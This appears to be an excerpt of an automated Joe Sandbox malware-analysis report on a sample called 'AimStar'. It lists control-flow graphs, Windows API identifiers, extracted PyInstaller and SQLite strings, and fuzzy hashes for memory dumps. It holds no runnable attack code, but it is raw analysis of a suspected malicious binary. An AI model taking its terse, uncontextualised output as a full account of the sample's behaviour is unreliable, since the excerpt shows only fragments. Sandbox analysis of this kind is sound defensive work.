7ff8a87d4e7a-7ff8a87d4e7e 2264->2266 2274 7ff8a87d4e90-7ff8a87d4e93 2265->2274 2275 7ff8a87d4eaa 2265->2275 2266->2265 2272 7ff8a87d4e80-7ff8a87d4e85 2266->2272 2270->2271 2280 7ff8a87d4ff3-7ff8a87d4ffd 2270->2280 2276 7ff8a87d5061-7ff8a87d5067 2271->2276 2277 7ff8a87d504e-7ff8a87d505c 2271->2277 2283 7ff8a87d4eac-7ff8a87d4eb0 2272->2283 2285 7ff8a87d4e95-7ff8a87d4e99 2274->2285 2286 7ff8a87d4ea1-7ff8a87d4ea8 2274->2286 2275->2283 2288 7ff8a87d5204-7ff8a87d5222 2276->2288 2289 7ff8a87d506d-7ff8a87d5070 2276->2289 2287 7ff8a87d5198-7ff8a87d519b 2277->2287 2281 7ff8a87d4fff 2280->2281 2282 7ff8a87d5009-7ff8a87d500f 2280->2282 2281->2282 2291 7ff8a87d5011-7ff8a87d5023 call 7ff8a8756880 2282->2291 2292 7ff8a87d503a 2282->2292 2295 7ff8a87d4eb2-7ff8a87d4eb5 call 7ff8a876ff50 2283->2295 2296 7ff8a87d4eba-7ff8a87d4ebc 2283->2296 2284->2254 2285->2286 2294 7ff8a87d4e9b-7ff8a87d4e9f 2285->2294 2286->2274 2286->2275 2297 7ff8a87d51a5-7ff8a87d51b1 2287->2297 2298 7ff8a87d519d-7ff8a87d51a0 call 7ff8a8785a70 2287->2298 2299 7ff8a87d5224-7ff8a87d522d 2288->2299 2300 7ff8a87d523f-7ff8a87d5246 2288->2300 2289->2288 2301 7ff8a87d5076-7ff8a87d507b 2289->2301 2305 7ff8a87d503c-7ff8a87d5043 2291->2305 2326 7ff8a87d5025-7ff8a87d5038 00007FF8BFAC3010 2291->2326 2292->2305 2294->2272 2294->2286 2295->2296 2296->2246 2307 7ff8a87d4ed2-7ff8a87d4ef2 call 7ff8a875a380 2296->2307 2312 7ff8a87d51b3-7ff8a87d51cc call 7ff8a875a380 2297->2312 2313 7ff8a87d51d8-7ff8a87d51e1 2297->2313 2298->2297 2309 7ff8a87d522f-7ff8a87d5237 call 7ff8a8780690 2299->2309 2310 7ff8a87d5239 2299->2310 2300->2233 2302 7ff8a87d5248 2300->2302 2301->2287 2311 7ff8a87d5081-7ff8a87d5088 2301->2311 2315 7ff8a87d5250-7ff8a87d526a call 7ff8a8756400 2302->2315 2305->2271 2307->2233 2309->2300 2310->2300 2311->2287 2321 7ff8a87d508e-7ff8a87d509a 2311->2321 2312->2300 2333 7ff8a87d51ce-7ff8a87d51d6 call 7ff8a8756400 2312->2333 2318 7ff8a87d51f6-7ff8a87d5202 call 7ff8a875a260 2313->2318 2319 7ff8a87d51e3-7ff8a87d51eb 2313->2319 2315->2233 2318->2300 2319->2318 2328 7ff8a87d51ed-7ff8a87d51f4 2319->2328 2321->2287 2331 7ff8a87d50a0-7ff8a87d50ad 2321->2331 2326->2305 2328->2300 2332 7ff8a87d50b0-7ff8a87d50c4 2331->2332 2336 7ff8a87d517d-7ff8a87d5188 2332->2336 2337 7ff8a87d50ca-7ff8a87d50ce 2332->2337 2333->2300 2336->2332 2342 7ff8a87d518e-7ff8a87d5193 2336->2342 2339 7ff8a87d50d0-7ff8a87d50e2 call 7ff8a8773820 2337->2339 2340 7ff8a87d5108-7ff8a87d5110 2337->2340 2353 7ff8a87d50e4-7ff8a87d50e9 2339->2353 2354 7ff8a87d50eb-7ff8a87d50f3 call 7ff8a8756c40 2339->2354 2344 7ff8a87d5112-7ff8a87d5119 2340->2344 2345 7ff8a87d5123-7ff8a87d5136 2340->2345 2342->2287 2344->2345 2349 7ff8a87d511b-7ff8a87d511e call 7ff8a876ff80 2344->2349 2346 7ff8a87d5146-7ff8a87d5152 2345->2346 2347 7ff8a87d5138-7ff8a87d513c 2345->2347 2351 7ff8a87d5154-7ff8a87d5169 call 7ff8a87b1310 2346->2351 2352 7ff8a87d516e-7ff8a87d5173 2346->2352 2347->2346 2350 7ff8a87d513e-7ff8a87d5141 call 7ff8a876ff50 2347->2350 2349->2345 2350->2346 2351->2352 2352->2336 2359 7ff8a87d5175-7ff8a87d5178 call 7ff8a8774c10 2352->2359 2353->2354 2358 7ff8a87d50f7-7ff8a87d50fa 2353->2358 2354->2358 2358->2342 2363 7ff8a87d5100 2358->2363 2359->2336 2363->2340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                          • API String ID: 2830847230-1046679716
                                                                                                                                                                                                                                          • Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                          • Instruction ID: ce0ae0ccfa48a0d0ddeb8a5ce92572b2ae412c940738b2a1623ff9a7b90b6916
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9F19122A4A692A7FB24DF21D4443BA6BA0FB85BC8F085135DA4D07795DF7CE481CF24
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3300690313-0
                                                                                                                                                                                                                                          • Opcode ID: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
                                                                                                                                                                                                                                          • Instruction ID: 31f2e8db8c8f3157ff2456a2215a88d3704b272ecb3133d9d6284fc14e2c12c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C621222A2919696F7198A38D4002BD77A0FB487C5F045532EA9FC37C8EB7CEE45CB14
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: :memory:
                                                                                                                                                                                                                                          • API String ID: 2830847230-2920599690
                                                                                                                                                                                                                                          • Opcode ID: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
                                                                                                                                                                                                                                          • Instruction ID: 3527b34b338cb5557710814021a4b79a9297eb001a74b2159834accaf97e66a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E42AE22A5F786A6EB649B25955433D27A0FF95BC8F044135CE5E03BA0DF3CE894C328
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction ID: eb04b7a23a504dda5c4cc24377168714489a7164a0105c3d30689595ea8f8b38
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83F0A432A1CA4586F7A09F60B45AB7AA394AB89338F840335DA6D427D4DF3CF04CCA00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                                          • Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                          • Instruction ID: 146718264c1ccd80f5b75327fbea6ae1340441dbf622cd3d65cf7533aa1de325
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32A1EB20B4BB4BA9FE59CB85A85C27822A4FF84BC0F544575C95E477A0DF7CE4948338

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 783 7ff710f41950-7ff710f4198b call 7ff710f445b0 786 7ff710f41c4e-7ff710f41c72 call 7ff710f4c5c0 783->786 787 7ff710f41991-7ff710f419d1 call 7ff710f47f80 783->787 792 7ff710f419d7-7ff710f419e7 call 7ff710f50744 787->792 793 7ff710f41c3b-7ff710f41c3e call 7ff710f500bc 787->793 798 7ff710f419e9-7ff710f41a03 call 7ff710f54f78 call 7ff710f42910 792->798 799 7ff710f41a08-7ff710f41a24 call 7ff710f5040c 792->799 797 7ff710f41c43-7ff710f41c4b 793->797 797->786 798->793 804 7ff710f41a26-7ff710f41a40 call 7ff710f54f78 call 7ff710f42910 799->804 805 7ff710f41a45-7ff710f41a5a call 7ff710f54f98 799->805 804->793 813 7ff710f41a5c-7ff710f41a76 call 7ff710f54f78 call 7ff710f42910 805->813 814 7ff710f41a7b-7ff710f41afc call 7ff710f41c80 * 2 call 7ff710f50744 805->814 813->793 825 7ff710f41b01-7ff710f41b14 call 7ff710f54fb4 814->825 828 7ff710f41b16-7ff710f41b30 call 7ff710f54f78 call 7ff710f42910 825->828 829 7ff710f41b35-7ff710f41b4e call 7ff710f5040c 825->829 828->793 834 7ff710f41b50-7ff710f41b6a call 7ff710f54f78 call 7ff710f42910 829->834 835 7ff710f41b6f-7ff710f41b8b call 7ff710f50180 829->835 834->793 843 7ff710f41b9e-7ff710f41bac 835->843 844 7ff710f41b8d-7ff710f41b99 call 7ff710f42710 835->844 843->793 847 7ff710f41bb2-7ff710f41bb9 843->847 844->793 849 7ff710f41bc1-7ff710f41bc7 847->849 850 7ff710f41bc9-7ff710f41bd6 849->850 851 7ff710f41be0-7ff710f41bef 849->851 852 7ff710f41bf1-7ff710f41bfa 850->852 851->851 851->852 853 7ff710f41bfc-7ff710f41bff 852->853 854 7ff710f41c0f 852->854 853->854 855 7ff710f41c01-7ff710f41c04 853->855 856 7ff710f41c11-7ff710f41c24 854->856 855->854 857 7ff710f41c06-7ff710f41c09 855->857 858 7ff710f41c2d-7ff710f41c39 856->858 859 7ff710f41c26 856->859 857->854 860 7ff710f41c0b-7ff710f41c0d 857->860 858->793 858->849 859->858 860->856
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F47F80: _fread_nolock.LIBCMT ref: 00007FF710F4802A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF710F41A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
                                                                                                                                                                                                                                          • Instruction ID: 41efa7b3495124fff8043f3b7efdc5bffd634e46589c353aa36484e706f4381c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E816F75B0CE8685E760AB24D442AF9B3A8FB48764F844431EE4D87785DE3CF589C760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
                                                                                                                                                                                                                                          • Instruction ID: 123a62a414823c4e96fb700e46b34fcb8be80b4484f9d6206dcf61333e7ba831
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3417D35B0CA4685EA10EB21A4029F9E3A8BF847A4FC44432EE1D47B95DF3CF54AC724

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1369 7ff8a87d4450-7ff8a87d4514 call 7ff8a87d4150 1372 7ff8a87d48c6-7ff8a87d48c9 1369->1372 1373 7ff8a87d451a-7ff8a87d4538 1369->1373 1376 7ff8a87d48d3-7ff8a87d48d6 call 7ff8a8756c40 1372->1376 1377 7ff8a87d48cb-7ff8a87d48d1 1372->1377 1374 7ff8a87d4552-7ff8a87d4556 1373->1374 1375 7ff8a87d453a-7ff8a87d454d 1373->1375 1379 7ff8a87d4566-7ff8a87d4572 1374->1379 1380 7ff8a87d4558-7ff8a87d455f 1374->1380 1378 7ff8a87d48ef-7ff8a87d490e call 7ff8a8882920 1375->1378 1381 7ff8a87d48db-7ff8a87d48e1 call 7ff8a87b1310 1376->1381 1377->1376 1377->1381 1384 7ff8a87d4574-7ff8a87d4578 1379->1384 1385 7ff8a87d457e-7ff8a87d4582 1379->1385 1380->1379 1383 7ff8a87d4561 call 7ff8a876ff80 1380->1383 1392 7ff8a87d48e6-7ff8a87d48e8 1381->1392 1383->1379 1384->1385 1389 7ff8a87d45fb-7ff8a87d4606 1384->1389 1390 7ff8a87d4584-7ff8a87d4588 1385->1390 1391 7ff8a87d458a-7ff8a87d458f call 7ff8a8773820 1385->1391 1396 7ff8a87d4610-7ff8a87d4627 call 7ff8a877d6f0 1389->1396 1390->1391 1394 7ff8a87d45f8 1390->1394 1397 7ff8a87d4594-7ff8a87d4598 1391->1397 1392->1378 1394->1389 1402 7ff8a87d4629-7ff8a87d4631 1396->1402 1397->1394 1399 7ff8a87d459a-7ff8a87d45a7 call 7ff8a88128c0 1397->1399 1406 7ff8a87d45de-7ff8a87d45e5 1399->1406 1407 7ff8a87d45a9 1399->1407 1403 7ff8a87d4633-7ff8a87d463c 1402->1403 1404 7ff8a87d463e 1402->1404 1408 7ff8a87d4641-7ff8a87d464f 1403->1408 1404->1408 1412 7ff8a87d45e7-7ff8a87d45ea call 7ff8a8756400 1406->1412 1413 7ff8a87d45ef-7ff8a87d45f3 1406->1413 1409 7ff8a87d45b0-7ff8a87d45b9 1407->1409 1410 7ff8a87d4705 1408->1410 1411 7ff8a87d4655-7ff8a87d4658 1408->1411 1409->1409 1414 7ff8a87d45bb-7ff8a87d45cd call 7ff8a8756880 1409->1414 1417 7ff8a87d470a-7ff8a87d471d 1410->1417 1415 7ff8a87d4695-7ff8a87d469b 1411->1415 1416 7ff8a87d465a-7ff8a87d465f 1411->1416 1412->1413 1419 7ff8a87d48a9-7ff8a87d48b1 1413->1419 1414->1406 1439 7ff8a87d45cf-7ff8a87d45d9 00007FF8BFAC3010 1414->1439 1415->1410 1426 7ff8a87d469d-7ff8a87d46b0 call 7ff8a8756880 1415->1426 1416->1415 1423 7ff8a87d4661-7ff8a87d4676 1416->1423 1424 7ff8a87d4753-7ff8a87d4766 1417->1424 1425 7ff8a87d471f-7ff8a87d4724 1417->1425 1420 7ff8a87d48b3-7ff8a87d48b7 1419->1420 1421 7ff8a87d48be-7ff8a87d48c4 1419->1421 1420->1421 1427 7ff8a87d48b9 call 7ff8a876ff50 1420->1427 1421->1372 1421->1392 1429 7ff8a87d4678-7ff8a87d467b 1423->1429 1430 7ff8a87d468b-7ff8a87d4693 call 7ff8a87ba8b0 1423->1430 1434 7ff8a87d476c-7ff8a87d4774 1424->1434 1435 7ff8a87d4768 1424->1435 1431 7ff8a87d4736-7ff8a87d473d 1425->1431 1432 7ff8a87d4726-7ff8a87d472b 1425->1432 1446 7ff8a87d46e6-7ff8a87d46ed 1426->1446 1447 7ff8a87d46b2-7ff8a87d46e3 1426->1447 1427->1421 1429->1430 1440 7ff8a87d467d-7ff8a87d467f 1429->1440 1430->1417 1444 7ff8a87d4740-7ff8a87d474e call 7ff8a8772ee0 1431->1444 1441 7ff8a87d4734 1432->1441 1442 7ff8a87d472d-7ff8a87d4732 1432->1442 1436 7ff8a87d4776-7ff8a87d4789 call 7ff8a8756880 1434->1436 1437 7ff8a87d47bc-7ff8a87d47be 1434->1437 1435->1434 1461 7ff8a87d47a2-7ff8a87d47a9 1436->1461 1462 7ff8a87d478b-7ff8a87d479d 1436->1462 1450 7ff8a87d47c0-7ff8a87d47c4 1437->1450 1451 7ff8a87d47cb-7ff8a87d4822 call 7ff8a8759180 call 7ff8a87ccfb0 1437->1451 1439->1406 1440->1430 1449 7ff8a87d4681-7ff8a87d4686 1440->1449 1441->1431 1442->1444 1444->1424 1454 7ff8a87d46f7-7ff8a87d4700 1446->1454 1455 7ff8a87d46ef-7ff8a87d46f2 call 7ff8a8756400 1446->1455 1447->1446 1457 7ff8a87d489a-7ff8a87d489e 1449->1457 1450->1451 1458 7ff8a87d47c6 1450->1458 1469 7ff8a87d4827-7ff8a87d4839 1451->1469 1454->1457 1455->1454 1457->1419 1464 7ff8a87d48a0-7ff8a87d48a4 call 7ff8a8774c10 1457->1464 1458->1451 1466 7ff8a87d47b3-7ff8a87d47b7 1461->1466 1467 7ff8a87d47ab-7ff8a87d47ae call 7ff8a8756400 1461->1467 1462->1461 1464->1419 1466->1457 1467->1466 1471 7ff8a87d4846-7ff8a87d4848 1469->1471 1472 7ff8a87d483b-7ff8a87d4841 call 7ff8a8756400 1469->1472 1474 7ff8a87d4855-7ff8a87d4859 1471->1474 1475 7ff8a87d484a-7ff8a87d4850 call 7ff8a87ae520 1471->1475 1472->1471 1477 7ff8a87d4872-7ff8a87d4874 1474->1477 1478 7ff8a87d485b-7ff8a87d4870 call 7ff8a87b13a0 1474->1478 1475->1474 1480 7ff8a87d4885-7ff8a87d4895 1477->1480 1481 7ff8a87d4876-7ff8a87d487e 1477->1481 1478->1457 1480->1457 1481->1457 1483 7ff8a87d4880-7ff8a87d4883 1481->1483 1483->1457 1483->1480
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                          • API String ID: 2830847230-879093740
                                                                                                                                                                                                                                          • Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
                                                                                                                                                                                                                                          • Instruction ID: 7bc3319e59d536fd5151955102d8b79a67f7ebd6ffbaa7dedee5bff19682e759
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
